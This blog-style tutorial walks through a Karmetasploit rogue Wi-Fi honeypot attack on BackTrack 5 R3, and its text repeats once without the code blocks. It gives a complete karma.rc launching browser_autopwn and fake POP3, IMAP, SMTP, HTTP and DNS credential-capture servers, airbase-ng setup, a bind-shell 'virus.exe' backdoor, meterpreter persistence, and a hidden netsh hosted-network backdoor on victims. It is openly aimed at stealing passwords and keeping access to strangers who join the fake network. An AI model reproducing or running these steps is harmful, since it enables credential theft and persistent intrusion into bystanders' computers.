Karmetasploit in BT5 R3[TUT][WIFI]
Alright guys, what we're going to be doing today is setting up
karmetasploit on backtrack 5 r3. This isn't a difficult attack, there's
just a little bit of configuration to do first. The attack itself is
the easy part. Since Karmetasploit is a few years old, a lot of how it
works just doesn't fit into backtrack anymore (for example, lines one
and two of karma.rc use sqlite3 which metasploit doesn't use anymore.)
The hardest part of this whole tutorial has been trying to make all of
the parts of an old yet awesome attack work together again with a newer
version of backtrack. I also threw some other stuff in here that could
help the attack such as increasing the power of your wireless card
(which will increase your attacks range) and a couple backdoor
possibilities including a wireless backdoor on a windows 7 victim.
This is basically an advanced mis-association attack by creating a honeypot using backtrack 5, aircrack-ng, metasploit, and KARMA. It's kind of a culmination of what I've been doing in other tutorials with software access points and I'm pretty excited to see what you guys think of it. It might be a good idea to brush up on honeypots and SoftAP's first. Check these tutorials out before we get started:
Mis-association with Honeypots
Wired to wireless soft AP creation
So here's what we're gonna do:
1. Configuring DHCP Server
Karmetasploit requires a dhcp server to be working in a specific way to give a certain IP address to our access point so that this attack can be as automated as possible. I'm going to show you how to use a build in DHCP server in backtrack which is dhcp3-server. Getting dhcp3 to work was a pain in the ass for someone who's not very experienced with linux. From what I found, during the move from R2 to R3 somebody forgot to add a line of code into the apt-get sources file, so you have to do this:
-go to /etc/apt/
-open sources.list with the text editor of your choice
-add this under the bottom line of the file:
Karmetasploit requires a custom dhcpd.conf file to work with karmetasploit, no worries here, just make your config file in /etc/dhcp3 look like this:
Don't forget to back up the original!
2. Create Karma.rc resource file for metasploit
So just about all of the links for the original karma.rc are dead. Those that are don't work anymore due to certain dependencies that aren't in use anymore namely sqlite3 in metasploit. props to John Freimuth for changing the original karma.rc file and posting his appended version for the public:
So there's that. You can read through it to see what exactly karma does, It's pretty awesome.
3. (OPTIONAL)Maximizing your Alfa Card
This is some cool stuff that I learned and I thought I could apply it to this tutorial. You can change the power of your alfa card (other cards work the same way, you'll just have to check and see what wattage it uses, and what is a safe dBm to set your card to.)
So what we're going to try to do is increase our EIRP (effective isotropic radiated power) which is calculated by transmitter power in dBm( my alfa is 1 watt which is equal to 30 dBm) + antenna gain in dBi - the cable loss in dBm(why my 5 dBi is actually better than my 9dBi antenna.) your card is standard in 20 dBm which is 2000 mBm (the max allowed by the default regulatory standards in linux.)
We can change this by changing our regulatory standards. There are different regulation standards for different countries, look up the regulation for yours if you're worried about breaking the law. I'm in the US, so I'll change to the US guidelines, which will actually increase my max transmission power from 2000 mbm (20 dBm) to 2700 mbm (27 dBm)
Now to change our transmission power to utilize almost the full strength of our card:
Now we're utilizing a full 7 dBm more than we were before, this is great because it will extend the range of our fake access point later on by a nice noticeable amount, allowing a wider range of victims or a stronger connection to and from what would be existing victims.
4. Wireless honeypot configuration with airbase-ng
First put your card into monitored mode:
next we're going to create our honeypot with these parameters:
now give it an IP address:
now activate our dhcpd3:
Let's go ahead and tail our messages log, this will give us some handy information that we can use in a bit
5. Creating a backdoor (planning ahead)
Alright, so what we can go ahead and do now is create a backdoor ahead of time so that we don't have to mess with trying to do that between the time it takes for us to get a meterpreter shell and the victim to disconnect from wifi. Since we'll be using metasploit from this point on, go ahead and start it:
Now we know from our DHCP config file that the dhcp starts handing out IP's at 10.0.0.100, so we can create a backdoor configured to this IP ahead of time, maybe a couple extra's (just in case more people authenticate)
Virus.exe created, come up with whatever name for it you want, it doesn't matter.
6. Firing up Karmetasploit
So, if all of your configuration is correct at this point in time, you have an at0 interface running a wireless honeypot, a correctly configured dhcpd.conf file, the messages log is being tailed, the correct karma.rc file in the correct location, metasploit running, our backdoor created, and dhcpd running we're ready to do this step.
This will start msf console and launch karma's resource file. Feel free to watch as it does it's thing. It's gonna fire off all kinds of exploits at the first target that connects to it, but that's just autopwn, anybody who's used that before is familliar with what it does. What sets karma apart is that it starts up POP3 servers and a bunch of stuff like that, so somebody who jumps onto your wifi for a second to check their email is screwed, I'll show you how to pull all of that information in a minute. If you're lucky enough to get a meterpreter session from autopwn, well then good for you! But it's pretty hit and miss, don't be upset if you don't always get one.
7. Stealing Passwords
okay, remember that messages log that we are tailing? It's pretty handy, We'll use that now. Whenever it starts doing anything that's our cue to look back over at metasploit. If you see that a target has been assigned an IP address then they are already being pelted with a wide array of exploits, if the target is making DHCP requests, definitely look over at metasploit and see what's going on because KARMA will have already intervened. If this situation occurs, you will see something like looks like this in karmetasploit:
That's obvious situationally if someone signed into a pop3 email server, but you get the idea. you get to see all of their passwords in plaintext.
8. Getting meterpreter session and backdooring.
So at this point in time if we're lucky our victim is trying to browse the internet. Hopefully we get a patient client, because karma is busy. He'll get a big loading screen instead of any actual internet activity, and because of this will probably disconnect if he's not patient. If he is patient, he'll sit there while karma sets up the attack to capture cookies, set up other servers, and basically issue a full on assault with exploits. If you're lucky you'll start seeing cookies pop up, which means those of you who know how to session hijack will be having some fun. With any luck, one of your many exploits will stick and you'll have a meterpreter session opened! You can see what kind of machine you've just obtained, and which user you're logged in to by:
Remember to migrate your session in case they decide to close out of their browser but stay connected:
This is going to spawn to new notepad.exe process for our meterpreter session to run under.
At this point, we have a good opportunity to install our backdoor from earlier, this is why we plan ahead. It should take us less than a minute to get a meterpreter session, figure out what we're doing and where we're at, backdoor, and get a shell.
After this we'll have our backdoor uploaded and ready to install at login!
Now to get a shell of their command line, we simply do this:
and now with any luck we have a nice shell shell running that we can do whatever with
9. configure and start a hosted network backdoor in windows 7
So at this point in the tutorial we have a backdoor uploaded, we're in a shell of their command line, all that is good and well but we're gonna take it a step further and create a wireless backdoor for ourselves!
The hosted network is a software access point available in windows 7 and on (which means you could do this with windows 8 too!) This is to create a personal area network and enable internet connection sharing, allowing one wireless interface to work as an AP and as it normally would, but we can abuse that. Lets pretend for a minute that we get a windows 7 victim with karmetasploit. Let's configure our own private hosted network that will be hosted by our victim!
Now it's configured but not activated, let's bring it online:
And there you have it! A fully functional wireless network hosted by your victim that you can access to get IP level privileges!
10. Maintaining Access
Alright, so at this point we have lured a victim in to a malicious honeypot, exploited them in some way to get a meterpreter shell, created 2 types of backdoors, and we obviously want to maintain some sort of access to this victim, so what do we do?
Well with the meterpreter backdoor we just fire msfconsole back up, once it's up you're going to open a handler and wait for the user to login.
Just wait, it will open up as soon as they log back in.
How about our wireless backdoor? Well whenever that computer is on we'll have access to our backdoor. We can connect to it whenever we are in range like any other network, except with IP level access to our victim, which can really be handy in certain cases, especially bypassing access control lists (I'll leave it to you to figure out what else you can do there!
)
This is basically an advanced mis-association attack by creating a honeypot using backtrack 5, aircrack-ng, metasploit, and KARMA. It's kind of a culmination of what I've been doing in other tutorials with software access points and I'm pretty excited to see what you guys think of it. It might be a good idea to brush up on honeypots and SoftAP's first. Check these tutorials out before we get started:
Mis-association with Honeypots
Wired to wireless soft AP creation
So here's what we're gonna do:
- make a DHCP configuration file to work with karmetasploit
- create karma.rc
- (optional)getting the most out of your wireless card (i'll be going over commands for an alfa AWUS036H since it's pretty popular and my personal favorite)
- using airbase-ng, configure our wireless honeypot
- Creating a backdoor .exe (ahead of time)
- launch the karmetasploit attack
- A little bit of password stealing
- get a meterpreter session, migrate it, get a shell
- configure and start a hosted network backdoor in windows 7
- maintaining access
1. Configuring DHCP Server
Karmetasploit requires a dhcp server to be working in a specific way to give a certain IP address to our access point so that this attack can be as automated as possible. I'm going to show you how to use a build in DHCP server in backtrack which is dhcp3-server. Getting dhcp3 to work was a pain in the ass for someone who's not very experienced with linux. From what I found, during the move from R2 to R3 somebody forgot to add a line of code into the apt-get sources file, so you have to do this:
-go to /etc/apt/
-open sources.list with the text editor of your choice
-add this under the bottom line of the file:
Code:
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing
-now save that and do these two commands:
apt-get update
apt-get upgrade
(just to point out the obvious, these will update backtrack)
-then this:
apt-get install dhcp3-serverKarmetasploit requires a custom dhcpd.conf file to work with karmetasploit, no worries here, just make your config file in /etc/dhcp3 look like this:
Code:
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;Don't forget to back up the original!
2. Create Karma.rc resource file for metasploit
So just about all of the links for the original karma.rc are dead. Those that are don't work anymore due to certain dependencies that aren't in use anymore namely sqlite3 in metasploit. props to John Freimuth for changing the original karma.rc file and posting his appended version for the public:
Code:
copy and paste into text file, name as karma.rc, save in /opt/metasploit/msf3
workspace -d Karma
workspace -a Karma
workspace Karma
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
runSo there's that. You can read through it to see what exactly karma does, It's pretty awesome.
3. (OPTIONAL)Maximizing your Alfa Card
This is some cool stuff that I learned and I thought I could apply it to this tutorial. You can change the power of your alfa card (other cards work the same way, you'll just have to check and see what wattage it uses, and what is a safe dBm to set your card to.)
So what we're going to try to do is increase our EIRP (effective isotropic radiated power) which is calculated by transmitter power in dBm( my alfa is 1 watt which is equal to 30 dBm) + antenna gain in dBi - the cable loss in dBm(why my 5 dBi is actually better than my 9dBi antenna.) your card is standard in 20 dBm which is 2000 mBm (the max allowed by the default regulatory standards in linux.)
We can change this by changing our regulatory standards. There are different regulation standards for different countries, look up the regulation for yours if you're worried about breaking the law. I'm in the US, so I'll change to the US guidelines, which will actually increase my max transmission power from 2000 mbm (20 dBm) to 2700 mbm (27 dBm)
Code:
iw reg set USNow to change our transmission power to utilize almost the full strength of our card:
Code:
iwconfig wlan0 txpower 27Now we're utilizing a full 7 dBm more than we were before, this is great because it will extend the range of our fake access point later on by a nice noticeable amount, allowing a wider range of victims or a stronger connection to and from what would be existing victims.
4. Wireless honeypot configuration with airbase-ng
First put your card into monitored mode:
Code:
airmon-ng start wlan0next we're going to create our honeypot with these parameters:
Code:
airbase-ng -P -C 30 -e "Honeypot" -v mon0now give it an IP address:
Code:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0now activate our dhcpd3:
Code:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
You'll probably get an error like "can't create PID file
/var/run/dhcpd.pid" Just ignore that, as long as it says "listening on
LPF/at0/yourmacaddress/10.0.0/24" and sending on the same interface
you're good.Let's go ahead and tail our messages log, this will give us some handy information that we can use in a bit
Code:
tail -f /var/log/messages5. Creating a backdoor (planning ahead)
Alright, so what we can go ahead and do now is create a backdoor ahead of time so that we don't have to mess with trying to do that between the time it takes for us to get a meterpreter shell and the victim to disconnect from wifi. Since we'll be using metasploit from this point on, go ahead and start it:
Code:
msfconsoleNow we know from our DHCP config file that the dhcp starts handing out IP's at 10.0.0.100, so we can create a backdoor configured to this IP ahead of time, maybe a couple extra's (just in case more people authenticate)
Code:
msfpayload windows/shell_bind_tcp RHOST=10.0.0.100,LPORT=4444 x > virus.exe6. Firing up Karmetasploit
So, if all of your configuration is correct at this point in time, you have an at0 interface running a wireless honeypot, a correctly configured dhcpd.conf file, the messages log is being tailed, the correct karma.rc file in the correct location, metasploit running, our backdoor created, and dhcpd running we're ready to do this step.
Code:
msf > resource karma.rcThis will start msf console and launch karma's resource file. Feel free to watch as it does it's thing. It's gonna fire off all kinds of exploits at the first target that connects to it, but that's just autopwn, anybody who's used that before is familliar with what it does. What sets karma apart is that it starts up POP3 servers and a bunch of stuff like that, so somebody who jumps onto your wifi for a second to check their email is screwed, I'll show you how to pull all of that information in a minute. If you're lucky enough to get a meterpreter session from autopwn, well then good for you! But it's pretty hit and miss, don't be upset if you don't always get one.
7. Stealing Passwords
okay, remember that messages log that we are tailing? It's pretty handy, We'll use that now. Whenever it starts doing anything that's our cue to look back over at metasploit. If you see that a target has been assigned an IP address then they are already being pelted with a wide array of exploits, if the target is making DHCP requests, definitely look over at metasploit and see what's going on because KARMA will have already intervened. If this situation occurs, you will see something like looks like this in karmetasploit:
Code:
POP3 LOGIN 10.0.0.102:1102 uname / password1That's obvious situationally if someone signed into a pop3 email server, but you get the idea. you get to see all of their passwords in plaintext.
8. Getting meterpreter session and backdooring.
So at this point in time if we're lucky our victim is trying to browse the internet. Hopefully we get a patient client, because karma is busy. He'll get a big loading screen instead of any actual internet activity, and because of this will probably disconnect if he's not patient. If he is patient, he'll sit there while karma sets up the attack to capture cookies, set up other servers, and basically issue a full on assault with exploits. If you're lucky you'll start seeing cookies pop up, which means those of you who know how to session hijack will be having some fun. With any luck, one of your many exploits will stick and you'll have a meterpreter session opened! You can see what kind of machine you've just obtained, and which user you're logged in to by:
Code:
meterpreter> sessions -i 1
meterpreter> sysinfo
meterpreter> getuidRemember to migrate your session in case they decide to close out of their browser but stay connected:
Code:
meterpreter> run migrate -fAt this point, we have a good opportunity to install our backdoor from earlier, this is why we plan ahead. It should take us less than a minute to get a meterpreter session, figure out what we're doing and where we're at, backdoor, and get a shell.
Code:
meterpreter > run scheduleme -e virus.exeNow to get a shell of their command line, we simply do this:
Code:
meterpreter> shelland now with any luck we have a nice shell shell running that we can do whatever with
9. configure and start a hosted network backdoor in windows 7
So at this point in the tutorial we have a backdoor uploaded, we're in a shell of their command line, all that is good and well but we're gonna take it a step further and create a wireless backdoor for ourselves!
The hosted network is a software access point available in windows 7 and on (which means you could do this with windows 8 too!) This is to create a personal area network and enable internet connection sharing, allowing one wireless interface to work as an AP and as it normally would, but we can abuse that. Lets pretend for a minute that we get a windows 7 victim with karmetasploit. Let's configure our own private hosted network that will be hosted by our victim!
Code:
netsh wlan set hostednetwork mode=allow ssid=whateveryouwant key=alsowhateveryouwant
I want to point out that this will be a wpa2-psk key, there is no other
option. Make sure you save that password somewhere so that you don't
get locked out of your own backdoor.Now it's configured but not activated, let's bring it online:
Code:
netsh wlan start hostednetwork
The great thing about this is that nothing changes at all for the
victim. There's no connection loss and there's nothing that comes up on
the screen to alert the victim [the exception to this after trial and
error seems to be intel my wifi technology, which gives a notification,
but you have a shell, uninstall it.]And there you have it! A fully functional wireless network hosted by your victim that you can access to get IP level privileges!
10. Maintaining Access
Alright, so at this point we have lured a victim in to a malicious honeypot, exploited them in some way to get a meterpreter shell, created 2 types of backdoors, and we obviously want to maintain some sort of access to this victim, so what do we do?
Well with the meterpreter backdoor we just fire msfconsole back up, once it's up you're going to open a handler and wait for the user to login.
Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_bind_tcp
msf exploit(handler) > set RHOST 10.0.0.100
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -zJust wait, it will open up as soon as they log back in.
How about our wireless backdoor? Well whenever that computer is on we'll have access to our backdoor. We can connect to it whenever we are in range like any other network, except with IP level access to our victim, which can really be handy in certain cases, especially bypassing access control lists (I'll leave it to you to figure out what else you can do there!
)
Well,
that's it for this tutorial, I hope you like it and I hope it can teach
you something. I worked hard on this tutorial and I'd really appreciate
any and all feedback, and if you like it, let me know! Enjoy, and happy
hacking!
![[Image: zZUIFRv.png?1]](http://i.imgur.com/zZUIFRv.png?1)
No comments:
Post a Comment